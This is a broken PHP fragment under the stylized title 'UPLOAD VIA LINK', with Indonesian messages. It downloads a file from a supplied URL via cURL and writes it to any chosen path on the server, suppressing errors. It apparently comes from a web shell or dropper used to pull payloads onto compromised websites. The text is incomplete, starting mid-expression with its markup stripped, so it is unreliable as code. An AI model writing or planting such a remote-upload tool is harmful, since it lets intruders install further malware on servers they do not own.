ŪPĹŌĀĐ VĪĀ ĹĨŅĶ










Direktori tidak ditemukan: ' . htmlspecialchars($path, ENT_QUOTES, 'UTF-8') . '

'; } else { $result = @file_put_contents($file_path, $file_contents); if ($result !== false) { $output = '

✅ File berhasil diunggah: ' . htmlspecialchars(basename($file_path), ENT_QUOTES, 'UTF-8') . '

'; } else { $output = '

❌ Gagal menyimpan file (izin ditolak atau tidak bisa ditulis).

'; } } } else { $output = '

⚠️ Gagal mengambil file dari URL.
Error cURL: ' . htmlspecialchars($curl_error, ENT_QUOTES, 'UTF-8') . '

'; } } else { $output = '

URL tidak valid.

'; } } echo $output; ?>